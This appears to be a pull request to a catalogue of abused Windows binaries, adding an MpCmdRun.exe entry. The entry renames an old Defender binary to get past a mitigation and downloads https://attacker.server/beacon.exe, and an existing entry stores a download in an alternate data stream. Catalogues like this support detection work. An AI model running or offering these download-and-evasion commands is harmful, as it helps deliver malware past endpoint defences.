### PR TITLE
Update MpCmdRun.yml

### DIFF
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -12,6 +12,14 @@ Commands:
     MitreID: T1105
     MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
+  - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
+    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
+    Usecase: Download file
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
     Description: Download file to machine and store it in Alternate Data Stream
     Usecase: Hide downloaded data inton an Alternate Data Stream
@@ -44,4 +52,6 @@ Acknowledgement:
     Handle: '@oddvarmoe'
   - Person: RichRumble
     Handle: ''
+  - Person: Cedric
+    Handle: '@th3c3dr1c'
 ---


### PR DESCRIPTION
DownloadFile option has been removed from current MpCmdRun.exe, but old binary remains on disk. Defender cmd line mitigation can be bypassed by simply renaming the binary in a folder controlled by the attacker